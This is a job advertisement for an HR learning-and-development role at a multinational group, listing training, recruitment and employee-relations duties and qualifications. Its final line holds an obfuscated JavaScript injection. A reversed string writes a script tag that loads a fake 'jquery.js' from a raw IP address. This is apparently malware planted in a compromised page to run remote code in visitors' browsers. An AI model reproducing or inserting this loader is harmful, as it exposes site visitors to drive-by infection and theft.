Industry : Multinational Group of Companies
– Ensure that the training need analysis is conducted for the year
– Develop in house training
– Prepare training calendrer for the year ( in house ) and create database of good trainers
a. Training Need Analysis (TNA)
– To develop TNA questions according to business need
– Conduct TNA
– Prepare report and identify suitable training
b. Training budget
– Prepare proposal to participate in Career Fairs
– Participate as per the approved budget.
– Plan, Organize and present Career Talks in Universities and gather outstanding students database
– Work closely with Jobstreet, internal communication on Qi Career page
c. Employee Relations Activities
– Develop employee relation Activities
– To plan, organize and coordinate atleast once a month activities for Staff
– Participate actively in Qi Social Club
– In charge of Employee Engagement Survey & activities to engage employee with the organization goal.
– To train all staff on the PMP & PDD curve (new joiners)
– Administering the daily recruitment activities and rendering support in ad-hoc HR related projects.
– To assist in Management Trainee Programme
– Degree in HR Management or any related disciplines
– 4 to 5 years’ experience in related field is required with strong in Learning & development exposure.
– Well presented and professional. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))